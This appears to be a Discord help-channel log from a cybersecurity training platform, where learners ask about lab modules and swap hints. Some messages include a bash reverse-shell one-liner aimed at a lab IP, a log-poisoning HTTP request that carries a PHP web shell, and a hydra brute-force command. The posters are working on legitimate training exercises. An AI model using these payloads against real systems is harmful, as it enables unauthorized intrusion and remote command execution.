#modules
Hello all
I am new here. If I'm wrong here or I'm breaking a rule, which I don't think I am, tell me.

Work on:
#Module Linux fundamentals. I am now on
#Section Name: Service and Process Management.

My question:
(First of all, I do NOT want solutions to the module question. I'll figure it out myself. I am very serious about mastering the learning process as best as I can on my own).
But...the following
1.I start the VM
2.right click on the desktop -> Open terminal-> get root with sudo su
3.i connect to htb-student via ssh. no problem.
Problem 1: Is OpenSSH already installed? If not, how do I install it? With apt? With dpkg? How?
4. according to the first step: systemctl start ssh
Output:==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:

1. mrb3n
2. cry0l1t3
   Choose identity to authenticate as (1-2):
3. Whatever I choose here, it asks for the password, which I don't know.

What am I doing wrong? What have I not understood? The error is 99% mine. I am sure of it.

Can anyone help me, please?
If I am in the wrong place, please tell me where and to whom I can address this question.

Green Punisher

what do you try to do?

if you have already logged into the machine with the user htb-student, it reuiqres that the ssh service is already installed and running on the target machine

like the second command in that section shows, you can verify it using systemctl status ssh

#modules
@Cry0l1t3
Wow...how fast you get an answer here. Thank you so much.

I would like to write down the individual steps/commands, execute them myself. To get more understanding.

I tried the command systemctl status ssh.But I don't get the same output as shown in the description.

In general, I am having a hard time understanding this section. My head is bursting.

The first three commands, under systemctl, do not give 1:1 the output what is described.
Systemctl start ssh, system status ssh &
systemctl enable ssh.

Why is it assumed that OpenSSH has not been installed when it is already pre-installed in the VM in order to log in to htb-student via ssh?

But I think I'm just blocking myself. I'll continue with the other commands.

If you have any tips, I am very open to them.
Also if you find that I have not understood something...let me know.

Thanks again for the help.

feel free to DM me if you need help to understand this

Im not understanding the problem. i did 1%,(1.01), (0.01), 0.01, .01 , and 1 nothings working

Use basic math. If you are still having issues, ask google how to find the difference between two numbers.

in cracking paswords with hashcat, I do not understand

from pwn import xor

I have tried the same, and it says pwn is not a module.Can someone please clarify what is happening here?

Python 3.8.3 (default, May 14 2020, 11:03:12) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import xor
>>> xor("p@ssw0rd", "secret")
b'\x03%\x10\x01\x12D\x01\x01'```

I want to understand this so I can accomplish the question Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00\....)

so p is xored with s, @ is xored with e, etc.

so take each character, convert to decimal representation, xor them

ohhhh... i over thinked it

Anyone can give me a hint for the LFI module? im at the final question and im having a bit of a struggle figuring out

Same problem here. Can anyone give a hint ?

hello, i have a question about an exercise, i believe i found the correct answer but it is not counting as correct

found what i was doing wrong
it requires the actual name, EX: NGinx, not the name of the service, like HTTP or SSH

it says its an interactive exercise

but theres no exercise in it

can someone help me w How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

I have absolutely no idea how to start

I did think of netstat and ipconfig but they didn't work when I tried

I mean they worked but it wasn't correct

Hi guys, I'm stuck on the last question of the SQLMap Essentials module : OS Exploitation "use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host." The hint given says its in a common directory, but when I run the option for common locations I only find the flag.txt file associated with the prior question. Can someone give me a nudge please ?

DM

will i lose access to completed modules as well when my student subscription expires?

The ls command is useful

++help

++help fun

No command called "fun" found.

++help Fun

+emma e

+flag e

This is not a command. Go fight off the aliens!

++emma e

I use arch btw

+e

++e

++help Utility

+whatpfp e

++whatpfp e

++help Macros

Found it. If anyone needs a nudge in the future, feel free to DM.

++tellmewhy

The competition used a vulnerability inWindows XP SP1 to make us look bad. But we have since worked with law enforcement, so it will never happen again.

++help

any nudge for final challenge in commandinjections ?

++help academy

Hi, im doing WEB REQUEST module and when i have to use Burp Suite, it is not like section where it is explained, can someone help, please? thanks

Hello, currently in the network enumeration with nmap module. It is asking me to enumerate the host name with nmap but everything i have done, and even looked up (that said was supposed to tell you the host name) has not worked. Any help?

++academy

Module: Getting Started
Section: Privilege Escalation

I don't know what I'm doing wrong. I...

• setup ovpn key to Academy sudo openvpn Academy.ovpn
• ssh into target machine's port ssh 'user1'@target_ip -p target_port
• I get my ip address 10.10.14.24 from ip a in a separate terminal (tun_0)
• I set up netcat listener on my 1234 port nc -lvnp 1234 in a separate terminal
• I try to get a reverse shell with bash -c 'bash -i >& /dev/tcp/10.10.14.24/1234 0>&1' from the ssh session, but it always times out or says that the directory doesn't exit.
• I tried using a mobile data hotspot from my android (since I am on college wifi, which can be restrictive sometimes). No change.

I've been stuck on this for weeks, and it's really discouraging.
Please help.

I can help if you wanna DM

Please don't spam this channel with bot commands

Yes

Hi all! I'm at File Inclusion / Directory Traversal - Skills Assessments. Who can help me pls? I found one important page via php wrappers but I can not understand what I can do next.. I found potential way to exploit but can not understand how

Hi,
I'm trying to get my academic email verified, so I can buy the student subscription, but the supportpage seems to be down.

what error you get?

we don't use this anymore

Hey Everyone is there any other defensive modules/paths in the academy as i can only find Javascript secure coding and deobfuscation and i need to prepare for my "Risk Analyst Role"...If anyone can help me with that also suggestions for the role are welcomed in dms. Thankyou

No need for now. I have done it.

Hi, I am stuck at the Skills Assessment of SQL Injection Fundamentals. I can do everything up to the webshell part. After successfully installing it I have no clue what to do next. Any tips ?

Ho guys, just a question....
How i can learn fast, are there Any books or some stuff like that?

Modules: Linux Fundamentals
Section: Working with Web Services

Need help with the following situation:
-I install apache2 according to the explanation
---apt install apache2 -y
-apache is installed.
-I start apache2 with:
----sudo systemctl start apache2

After that I open the Firefox browser in the HTB VM and enter localhost.

Output:
Error response
Error code 405.
Message: Method Not Allowed.
Error code explanation: 405 = Specified method is invalid for this resource...

Can someone help me here.

Thank you.

Figured it out

that's subjective and depends 100% on how you learn the best

some people need to read something and then explain it to others

some need to read and read even more

some need to figure it out bits by bits themselves, then read to confirm and fill the gaps

some need to learn by doing e.g. somebody showing it then them doing it again with help

++help Giveaway

i've got a syntax error in sqli module. The first half of the command works just fine, but when I try to incorporate the AND, it errors and I can't figure out how to fix it.

anyone available for a nudge on Command Injection - Skill Assessment?

Module : Windows privilege escalation
Section : Dns admins

i added user under domain admins
cannot read the flag
added under localgroup administrators group also
cannot read the flag
(ran cmd as admin also)

++academy

And also try to refrain from spamming please

I have problem with last module in FILE INCLUSION / DIRECTORY TRAVERSAL. How to read index.php?

Module: Cracking into HTB
Section: request and response

It says to boot up foxy proxy as well as burp, but foxy proxy isn't configured yet as a proxy (so it's disabled) and i don't know how to do that yet

One of the task in Skills Assessment - Part I is: "Find the password for the ldapadmin account somewhere on the system". I searched around all the box with low privileged shell but I cannot find ldap admin password. I used all the techniques described in the module. Any clue?

Go to foxy options, set the address to 127.0.0.1, set the port to 8080 and name it whatever you'd like (i name it burp). Set it on (green) and you're set up. You can then go to burp and catch the requests. If you want a more detailed walkthrough, there are videos on YouTube .

Thank you

I really appreciate it

You're welcome. I've also been there 👍

yo guys i installed pyftpdlib now when i do this python -m pyftpdlib -p 21 it says permission denied and when i run with sudo it says no module named pyftpdlib

have you tried sudo python3 -m pyftpdlib -p 21

anyone on Broken Authentication?

yep

it says permission denied and when i run with sudo it says no module named pyftpdlib

sudo pip3 install pyftpdlib

hi guys can you give me instructions about how to get hacker rank on htb??

do active content

Is the Instanced Browser-Based Virtual Box Parrot thing (What do I call it?) working properly at the moment?

I can't connect to the target boxes with it

I read there is a partial system outage, is that the cause of this?

++academy

Can't connect to VPN for academy and can't figure out why?

I'm having trouble too. Anyone else ?

oh thank god

I'm doing the Intro to Network Traffic Analysis (Wireshark part) and I can't connect to the Nomachine Lab.

trying to upload a screenshot of the terminal when i try to login to vpn

Here's the message I get "A connection timeout has occurred while trying to connect to '10.129.254.239' on port '4000'. The issue could either be caused by a networking problem, by a firewall or NAT blocking incoming traffic or by a wrong server address. Please verify your configuration and try again."

Checked config many times. Maybe I'm doing something wrong. Anyone else ?

have you connected to it before doing what your doing now

Once, yes.

referesh the target ip address

I did...

same problem. Tried reinstall openvpn without sucessfull

Just heard from HTB that the Academy VPN is down. Probably because plutonium used to power it overheated causing fire, death & mass destruction to facilities & surrounding village.

Ok, I see other ppl are having issues with the academy vpn. Any word on status

Thanks for the info man

https://tenor.com/view/dead-server-xd-dead-chat-xd-meme-gif-22714174

Thanks for info

Time for a cup of coffee

i was going crazy...

+1

I was too lol

Which wrapper did you used for source code disclosure

Me too I think that in fifteen more minutes I would have destroyed everything

Randomly re-assigned settings, regenerated everything

I did too, then I came here and read your messages guys. Good to know we're not alone in this

It works now!!!

Yeah! they fixed it 😄

the best words "Initialization Sequence Completed"

xDDD

Yes indeed, great news ! Thanks guys for the great intel 🙂

Looks like its back up but maybe not completely there yet. I can't use curl on one of the target websites I'm on

HI im new

hi im new too

hi @distant canyon

you are not bot right ?

NO

I am new and trying to connect for my first module to answer the questions how to connect with RDP to 10.129.168.19 with user "htb-student" and password "Academy_WinFun!" I spawned and try to xfreerdp /v:<target IP address> /u:htb-student /p:<password> and not work

@distant canyon i mean, it should work. What type of error are you getting

Some solve Skill Assessment - Broken Authentication, im a little stuck

how can I post a screen capture here

S /home/user252322> xfreerdp /v:<10.129.205.2> /u:htb-student /p:<Academy_WinFun!>
[21:38:42:020] [3245:3247] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]

^solved

cracking passwords with hashcat-

When I run zip2john on Misc_hashes.zip, it tells me that it is not encrypted

I need some help on the hash at module section cracking common hashes can’t figure out the right rules/masks can anyone help?

Hi

I need some help with a Box,

I've enumerated the ports that are open in the box.

#boxes

Thanks

np

But I don't have permission to send msg in the boxes

https://discord.gg/hackthebox

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

Hey the 7z file is inside the zip you downloaded so you need to unzip it normally and you will get the 7z file that you need to crack. Any chance you can help me solve the previous section? Cracking common hashes

Attacking web app with ffuf - Parameter Fuzzing - GET

Hi guys,
I`m stuck on this question "Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?" or to be more specific for some reason even if I add target's IP to vim /etc/hosts and assign it as admin.academy.htb I'm still not able to reach this site. If I put only IP into the browser its showing me " Welcome to HTB academy" so I guess something is wrong.
I would appreciate any help

nvm, issue solved 😄 I found out that I have put only 1 space instead of 2
GL guys!

Hi !! i' m stuck in last part of lab (Part II) of Windows Privilege Escalation. Anyone could help me? Thanks in advance 😉

im doing the skills assesment section in the file inclusion/directory traversal

i ||read source code of index.php|| then ||admin panel source code|| then ||log poisoned /var/log/nginx/access.log with this burp suite request in repeater|| =

||GET /ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat%20/flag.txt HTTP/1.1 Host: 188.166.173.208:32633 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: <?php system($_GET['cmd']); ?> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close||

|| log message is empty for some reason plis help188.166.173.208 - - [17/Sep/2021:13:20:02 +0000] "GET /ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat%20/flag.txt HTTP/1.1" 200 1582 "-" ""||

bruh

why is the flag file

named

flag_yp9yq2lnlaj,sbn '[0p92eu7 ['ip9hnajlkwdh ;oaiuw8gh d;'iowahd'iagwhdp ;io8uagtwpd ;8guwao['d8ihaw['do80iawh

;C

i spent

30mins

trying to cat%20/flag.txt

now i tried doing ||ls|| first then read it

phew

it worked

Thanks alot

why thank me?

hii

im new in here

@mint kettle Welcome!

hi

i ma new

guy

welcome

Thanks

🙂

check the pinned comments if you are lost

ok

So how to start learning CyberSecurity or htb

for example:

1. https://academy.hackthebox.eu/course/preview/learning-process
2. https://academy.hackthebox.eu/course/preview/linux-fundamentals
3. https://academy.hackthebox.eu/course/preview/windows-fundamentals
4. https://academy.hackthebox.eu/course/preview/web-requests

any hint brute force password "broken authentication"

When this module

Very soon 😄

Hello everybody. I'm stuck on one of the Linux Fundamentals questions: "How many files exist on the system that have the ".log" file extension?"

I've tried a bunch of different find commands but I can't see to get the right result. Any help would be greatly appreciated.

||find / -name *.log -type f 2>/dev/null||

Try this

Hello. I am doing Getting Started and I am having trouble getting the right flag. I tried Gobuster and got unable to connect error. So I tried Nmap LOL. Anyways, it returned a /flag.php on port 31337. I went to 46.101.14.69:31337/flag.php found "989297b616767ea48ea42aed195e765e" which I thought was the flag... It is not apparently. I tried the other methods explained in the Web Enumeration section but non worked. I did this while on Acadamy.ovpn and also tried StartingPoint.ovpn both gave me errors with Gobuster and other methods except Nmap.

In Academy it's showing you target ip with port 31017 , so I guess on port 31337 must be something else , try banner grabbing or nmap [or any other as mentioned in module ] for that ip with specific port given

Hello Everybody actually I am stuck with Windows and Linux so I am having a confusion will it work on windows. I am a new member to all this so can you help me understand everything. Thanks.

Can one of them dm me to lemme all process for starting.

Are you asking if you can complete the Linux fundamentals from Windows? If so, yes. There’s an in browser remote desktop to have some hands on interaction with Linux.

Actually as I am new so can you just dm me and tell me how to setup and all the things. I am really sorry it will waste your precious time but please help me out

hello

Is there a way I can add "my" faculty to the academy htb? I wanted to register with my faculties mail, but it isn't recognised...

my account balance become negative number. can someone help me?😩 and how can i upload the image of the issue?

Thank you so much. For some reason I did not think of scanning that port lol. I did it with Nmap since gobuster did not work. Thanks alot!

Yoo guys am I correct in saying dpkg --list | wc --lines gets how many total packages are installed on a targets subsystem?

cause I ran it and got 748 and tried submitting it as an answer but said it was wrong but I am sure this is how you do it?

nvm fixed it

am i missing something ive managed to login as admin but when im submitting the key i find its saying the answer is wrong can anyone give me some help on this been on this for about an hour 😄 sorry im learning..

Which module is that

it's the web request POST section. tamper all sections of the cookie

hi guys
new to chatting buh here for a while now
also having problems with that

@rustic sage @ruby trout make sure that you're actually logged in as admin, and that the website doesn't just show whatever name you input

first was guest
and now loged in as admin buh still rejecting flag??

im still on it, ive been trying do it for about 3 hours now

😄

@ruby trout i cant seem to get flag im just getting guest_XXX admin_XXX etc

still rejecting

if you succeed the flag is shown on the page itself

can't miss it

...I've heard anyway

It's not the flag then

oh okay so then what now??
i have to submit something then

you gotta get the flag

ok
ill try as hard as possible
thanks

Ah, I figured it out

Try to look at the relationships between a certain 🍪 and the text displayed. Then remember which user you need to become and see if you can modify something to change the username.
@ruby trout @rustic sage

oh, and yes, the flag itself is shown very clearly when you succeed - can't miss it

Anyone working on 'Secure Coding 101' module, I am looking for help regarding the Skills assessment.

Check dm

Yoo guys I am following web request academy module and it says that burp should appear here but it isnt, I have started a "new project" on burp etc
https://cdn.discordapp.com/attachments/613049811481919508/889132857488969778/unknown.png
This is what my burp looks like
https://cdn.discordapp.com/attachments/613049811481919508/889132919250096158/unknown.png

Hi , im trying to pass the Linux Local Privilege Escalation - Skills Assessment.
Im stuck on flag5. That means i can not escalate from tomcat to root.
Can anyone please give me a hint to proceed?
Thanks

u have to configure the addon under options

i have the same problem, have you get the solution?

could use some assistance. Currently working on Linux Fundamentals > Working with Web Services. I've installed Apache2 on my VM, but when attempt to open http://localhost, get an error 405

i need help for the hacking wordpress module, i used wpscan but the website don't work on wordpress, i look the source code but i don't see the version of wordpress, is 3 hours that i search but i don't find nothing of relevant, can someone help me please? thanks

so...i think i'm getting this error because, by design (??), there is a Python WebServer running, in order to get to the VM via the web. If so, am i missing something in the module?

Yoo guys I am on web request module and I spawned my target and tryna navigate to the site and when I enter 178.62.42.158:32752 it says proxy server is refusing connections

Are you using the pwnbox?

my own VM

I am using

yoo guys how come I am receiving a 302 Found on burp when going to my target site but on the tutorial they are getting 401 unauthorized which shows html code etc but mine doesn't show nearly as much?

What theirs shows

what mine shows

Hey guys, I'm trying to connect to this IP via VPN on my own vm. I can curl the IP, but nmap says that the host is down. What am I doing wrong?
edit: I figured I didn't need to nmap

Hi. I have some problem with "Linux Fundamentals" module. For example so simple stuff like kernel version. When I paste value readed from uname -r submit button give an error.

There is more problematic questions in this module. Where I'm positive about answers but submiting gives an error

I felt the same way when I done it aha, linux fundamentals was quite hard and didn't really teach what the questions were asking

So I had to do a lot of googling

example question: Which kernel version is installed on the system? (Format: 1.22.3) and uname -r is: 5.10.0-6parrot1-cloud-amd64 It does not matter what value I'll paste. Full or just 1.10.0 or 5.10.0-6 submit always gives an error. Frustrating.

Hi, anyone who can help me with this issue I'm having trouble with?

I don't know what I should do

oh, ok I have to admin:password and use burp suite

it's not a question it is a flag I'm done

I just completed this one, how can I say this without it being a spoiler, hmm. best thing I would say is you need to search the correct terms on firefox

well not firefox

but whatever search engine you use

you need to give it two parameters aka num1 and num2 which are in the question

Is it in plan to make more modules for Defensive side?

Also is there a EST for these modules?

I asked this too as I would like to know more about defending then attacking but they said if you know how to attack then you can also defend against them which is pretty true

Well that makes sense, thanks for info

No problem, I really want more defensive modules as I want to make sure people can't affect me but hey ho

Some recommend to start learning networking and build up from there

Some people recommended me CCNA>Security+>Linux+>AWS>CISSP

I know it's on their TODO list, especially since they have been looking for content developers specifically for defensive content, however I'd like to recommend - as well - to explore more offensive theory as this is really what you want to defend against in the first place

Of course you can rely on public information and show your future managers that you have all the IoC's already noted down and just need to update your SIEM and EDR to trigger on these and everything's good...

And this is definitely better than not having done anything, but being subscribers to other people's research will keep you behind the trend

Like storm proofing your home at the end of the hurricane season

Knowing both worlds makes you a much stronger analyst because it enables you to not only prioritise between the events that are happening, but also explain why you may want to recommend doing something which isn't in the CISSP Holy Grail Checklist

anyway... but yeah, stay tuned @steel trellis and @unreal flume, I'm confident that blue team oriented content is on the drawing board 😄

Thank you 😁

In Linux Fundamentals/Package Management it shows how to install strance for Ubuntu 18.04 LTS.
Whenever I run the command that is provided in the Parrot Terminal, connection gets timed out when connecting to archive.ubuntu.com.

Is there anything else I am supposed to do to make it connect properly with the Ubuntu Archive?

Are you a Free user? 🙂

Hi, I can't spawn containers on "Cross Site Scripting (XSS)" - Session hijacking. Could someone look into this? Thanks!

OK, never mind. Just came up after 5 minutes. Sorry for the noise.

Yes, I am.

Free users don't have access to the internet 🙂

Hey,
Can someone guide me with Local File Inclusion after I found credentials for mysql. Please

I just wanted to say how great the Windows Privilege Escalation module is! It’s the 19th module I’ve completed and it was by far the best. There is a lot of content that is presented in a very clear way and the examples and skill assesments are very well chosen. Thanks a lot, @blissful verge !

what is CPE credits submission?

?

LMGTFY:

https://www.efilecabinet.com/everything-you-need-to-know-about-cpe-credits/

oh

nice

looks like they are adding some more things with alot of new modules incoming

billing page revamp

and exam vouchers :O

Thanks a lot Fugl, information is really helpful. I'm gonna also focus more on pentest side

@uneven pond I think the mistake I kept making was setting the parameters as 2 different numbers that equal 1337when it should have just been num1+num2=1337, or num1=1337

no, it's just a flag, no an answer

Anyone can help me with Attacking Web Applications with Ffuf?
Im stuck at the final assessment, on this question
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
Having some trouble finding the page
Would appreciate a hint.
Please pm/ping me

Hi, currently doing the Login Brute Forcing with Hydra
Skill Assesment: Website second question:

• 5 Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Could someone provide some guidance? I think im close, here is my current attempt:

||
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 46.101.91.241 -s 30624 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:T=<form name='HTB{'"
||

i cant seem to figure this one out, any tips besides check all conversations?

Let me check my notes

tyvm

@viral yarrow @icy snow you still need help?

I have the answer but was trying to walk @viral yarrow through it

Yes you can either use your own vm or buy any amount of cubes or subscribe 🙂

hi, use intuitive params

Hi can I get a help here? I'm working on getting startd Privilege Escalation module.

• I've got into user2 account, and checked the contents in id_rsa
• The module taught me to do;
  bulias@htb[/htb]$ vim id_rsa
  bulias@htb[/htb]$ chmod 600 id_rsa
  bulias@htb[/htb]$ ssh user@10.10.10.10 -i id_rsa

whenever I do vim (id_rsa), it pops up with new window with nothing(sorry, I'm total noob) and don't know where to go from there.
Can somebody give me some guide or hint what to do after vim window is on?

and it seems like i already have permission to read id_rsa file on root, however, I'm not sure how to use it to connect ssh with root.

Pleeeeeese help

may be they told you to execute vim id_rsa command in .ssh folder, becasue if you are going to execute in any random folder the it will create new file named as id_rsa without any content.

Thanks for help! I excuted it on .ssh/ folder, and they gave me id_rsa contents. However I'm not able to perform chmod due to lack of permission.

use sudo

don't have password for user2

and have password on user1 but it didn't had permission to use sudo uhhhh devastating

Got it 🙂

Hi, I've been stuck here for hours now, it's time to ask for help.
Module Broken Authentication - Predictabile Reset Token - Question 1
Here the algorithm used to get the token should be md5(username . linux_epoch_in_ms_date_of_creation) so
md5(htbuser1632235373000), which is7e465309868c1713c1fa8e2a54784397 and not the token given me by the system.. I've also tried + and - some seconds.
I think I didn't get the question properly, can someone help me please?

You already know that you have to convert the time to milliseconds, that’s good. Now, you don’t want to be htbuser, do you? 🙂

Thanks for answering! No, i want to be htbadmin, but If the algo doesnt work for htbuser, it's not gonna work for htbadmin 😦

Ah ok. Did you use md5(YOURSTRINGHERE.encode()).hexdigest()?

md5(("htbuser" + str(1632235373000)).encode()).hexdigest()

I’ll DM you.

Solved thanks to iougiri!

Hey

hi

hey everyone, can anyone help me with the instruction address, specifically "finding a return instruction", module: STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86

I'm stuck in the Public Exploit session of Getting Started module, nmap scan doesn't find anything or freezes when I give -p- as flag

Is there any plan to offer a higher tier annual subscription for the academy? Just curious.

Complete noob here, decided to work on the bug bounty path as a way of getting started with infosec and getting stuck on HTTP methods - specifically the POST method module. I get the hint about the cookie, but I was hoping for ... I dunno, maybe another hint? I'd prefer not to just be handed the answer, because it's the figuring it out is where you learn

With lack of understanding of the basics you have like 0.001% in bug bounty to earn monies, I have never earned anything and I have wasted weeks on it and Im linux user since smthn about 20yrs and im not any close to noob with infosec, so you have selected too hard road too fast imho. You should just play some ctfs and learn basics, read some books first etc.

I'm in school for compsci, have my AWS CPP, CompTIA A+, Net+ and Sec+

so I'm a noob when it comes to using the tools I should say. I'm not a computer noob.

And you know, I wanna know this stuff because it's going to play into my ability to architect secure AWS systems.

so hard is OK. I think I figured it out - like everything, the devil is in the details.

if we get subscription and completed a module, but decided not to continue subscription the following month.
do we still have access to those modules that we have previously completed?

Yes. You maintain access to modules you have unlocked prior.

nice, that's good to hear

Hi, currently doing the Login Brute Forcing with Hydra
Skill Assesment: Website second question:

• 5 Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Could someone provide some guidance? I think im close, here is my current attempt:

||
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 46.101.91.241 -s 30624 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:T=<form name='HTB{'"
||

dm

Hi, I'm doing Stack-Based Buffer Overflows on Linux x86 and the question in Take Control of EIP, just doesn't make sense to me

What’s wrong?

Examine the registers and submit the address of EBP as the answer.
This is highly dependent on my input

Hey can anyone help me with skill assessment of file inclusion/directory traversal

And if i dont segfault, i'd need a break point, and if i made a breakpoint, wouldn't the EBP be dependent on where i did that?

Which section is this? Just trying to check the context

The one called Taking Control of EIP

Well you’re given input to enter, which causes the program to crash. You can then inspect the value of EBP after the crash

Cannot see where i'm given an input

Ahh the payload from before. Can't say i find that super intuitive.

Would have prefered for there to be a short line about using the payload from above, in the question text

Hey,
Can someone guide me with Local File Inclusion after I found credentials for mysql. Please

Has anyone done the Local File Inclusion Skills Assessment? Would love a nudge 😛

Hey all! I'm a noob here and could use a little help. I'm on the getting started knowledge check with the GetSimple website. Found creds, but can't use? Can someone give me a nudge?

To be more specific, I found the admin credentials. Least I think I did, haha

@candid hamlet thanks for the note. Will look into making it clearer that you should use the same payload.

Hi, sorry but after 4 hours of failures, I'm going to ask help again 😦
Module: broken authentication - bruteforcing cookies
Question: Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?

So I managed to decode and encode the cookie as role:admin and got a 'successfull' response. But not successfull enough, as it seems :/
I've tried a lot of combinations with user and role, but nothing seems to work.
I've also tried to bruteforce the 'time' param in the decoded cookie but nothing. Can somebody help me please?

I got stuck in rest token

Hey, I've been trying for a while to get the answer to a Question.
I looked at it for so many times already, but I don't get it.
The Module is Getting Started - Public Exploits - First Question.
I don't know if I forgot something or simply wrote it wrong, could someone help me please?

what tools are you using?

I use Metasploit (msfconsole) and exploitdb

okay, do you have your hosts and ports set correctly?

do you mean rhosts and lports?

yep

hi

I believe you want to make sure you're using your tun0 for your LHOST

I think it is right but i dont know

double check those, if you need your ip, use: "ip -a" command. That will give you your ip info.

I will also tell you need to pay attention to anything in the MSFConsole that has a "yes"...That means you will need to set that item.

ok but I don't think I have the right exploit in use

sorry if Im not exact

Alright, still stuck on the HTTP POST module. I modified the cookie so that I was an admin rather than a guest, re-encoded it and submitted it through Burpsuite which the website accepted, but I'm not exactly sure what the module is looking for as an answer. Any pointers?

Nope, I get it. We're trying not to give away spoilers 🙂

If you did your enumeration, that should lead you to the exploit you need. I did set the path in metasploit too

That one gave me some heartburn too. I will tell you that it's probably more simple than you realize. You are on the right track though

Ok thanks

Alright, so encoding the application into a JSON submission is overkill, copy

Hello anyone from HTB Staff can help me with HTB Academy with a payment?

I ended up having to call my bank because HTB is based in the EU, which was blocked by my bank without special authorization.

haha, yeah. If i remember right, you should be able to replicate what you did in the learning sections to recreate what you need for the flag. The key is in the admin credentials.

gotchya. I'll keep at it - keeps me entertained while I'm taking calls for the scam computer repair service.

hahaha

btw I REALLY wish we could change our nick on this server

oh wait, is this because this is the nick I signed up with HTB with? yikes.

I need better taste.

lol yeah.

haha

think you can change your name on HTB?

¯_(ツ)_/¯

I would anticipate if you did you could get it to update here too?

Hi

has anyone done the assembly language module? im having trouble with how im supposed to even open this file so i can find the hex value

If it tells me to SSH with htb-student, isn't there supposed to be an ip address included? (Linux Fundamentals)

Yes, when you spawn your box, you'll be given that IP

I have no option to spawn it tho

Are you at the end of a section? If you look just above the questions, there should be a link.

Answer the question(s) below to complete this Section and earn cubes!

 SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"

yeah, I think it's just above that?

not in my VM at the moment, i can hop on in a sec

The only thing above that is the word Questions

hmmmm. gimme a moment to login

Should see something like this where it says "Click here to spawn target system"

https://gyazo.com/40e25b84b25a59083128797e7c01a691

What's right below that? Anything that says to spawn a target or just the questions?

Just the questions

Also, are you using vpn or the pwnbox

vpn

don't know that it matters, I think you still have to spawn the target

But that shouldn't affect if I can spawn it or not

huh...it should be there. Maybe look above that where you have the big window for your pwnbox?

correct, there should be a link around there somewhere

So that's what i see, questions are just below the end of the screenshot there

I have information > pwnbox > questions

With no link to spawn

which module are you on, maybe I can look in there and see?

Linux Funamentals - Web Services

hmmm. That one you may have to start the instance to do? I'm seeing the same thing you are

For these questions I don't really need to connect anyways, so I will just do it without

Thanks anyways

yeah, that's true. sorry i wasn't more help. I'm new to all this too, haha.

Hey @soft grotto I've just been playing with HTTP POST/GET parameters, and I'm kinda lost. Manipulating the cookie causes me to get a "Welcome admin_hash" and manipulating the application type from x-www-form-encoded to json causes the application to time out. Attempting to submit the admin/password credentials instead of guest/guest gets me a 400 error. Any suggestions for me?

IIRC, for that section, you're given guest:guest and need to get in as admin for the flag correct?

Yup.

So I authenticated as guest, and then manipulated the cookie to get the admin_hash page, but that's not the flag.

using burp, you can get the cookie and use ctr+b to decode/recode. There's a specific thing it's looking for on the cookie

think of it this way: You can have lots of users. How many admins would you have?

there should only be one for this exercise, right.

OMG so overthinking it. Thanks Insp

mind if I DM?

I got it

lol

you got it

hahaha

I'm gonna go dance for a minute

I did the exact same thing

well, not the dancing part

Anyone able to give me a hint?

On Getting Started Module
At last question: escalating to root after getting a foothold.

I've gotten a shell, no problem and can load tools, files, etc. I've tried using the exploit that linpeas calls out, I've tried uploading php scripts for shells to the site to no avail.

Am I over complicating things?

We need modules blueTeam, like spunk, snoopy

pls be careful with spoilers

We need modules blueTeam, like spunk, snoopy

Powershell, anitvires ev

apologies, thought i was being discrete enough

Hi

Would like to ask

We must use pwn box for academy?

Can we use openvpn something like that?

Cool

Let me try

😊

i cant connect to the academy vpn key for some reason

ef:2::1,ifconfig 10.10.14.115 255.255.254.0,peer-id 42,cipher AES-256-GCM'                                            │
2021-09-23 09:14:30 OPTIONS IMPORT: timers and/or timeouts modified                                                   │
2021-09-23 09:14:30 OPTIONS IMPORT: --ifconfig/up options modified                                                    │
2021-09-23 09:14:30 OPTIONS IMPORT: route options modified                                                            │
2021-09-23 09:14:30 OPTIONS IMPORT: route-related options modified                                                    │
2021-09-23 09:14:30 OPTIONS IMPORT: peer-id set                                                                       │
2021-09-23 09:14:30 OPTIONS IMPORT: adjusting link_mtu to 1625                                                        │
2021-09-23 09:14:30 OPTIONS IMPORT: data channel crypto options modified                                              │
2021-09-23 09:14:30 Data Channel: using negotiated cipher 'AES-256-GCM'                                               │
2021-09-23 09:14:30 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key                          │
2021-09-23 09:14:30 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key                          │
2021-09-23 09:14:30 net_route_v4_best_gw query: dst 0.0.0.0                                                           │
2021-09-23 09:14:30 net_route_v4_best_gw result: via 192.168.1.1 dev enp4s0                                           │
2021-09-23 09:14:30 ROUTE_GATEWAY 192.168.1.1/255.255.255.0 IFACE=enp4s0 HWADDR=d4:5d:64:ab:eb:8f                     │
2021-09-23 09:14:30 GDG6: remote_host_ipv6=n/a                                                                        │
2021-09-23 09:14:30 net_route_v6_best_gw query: dst ::                                                                │
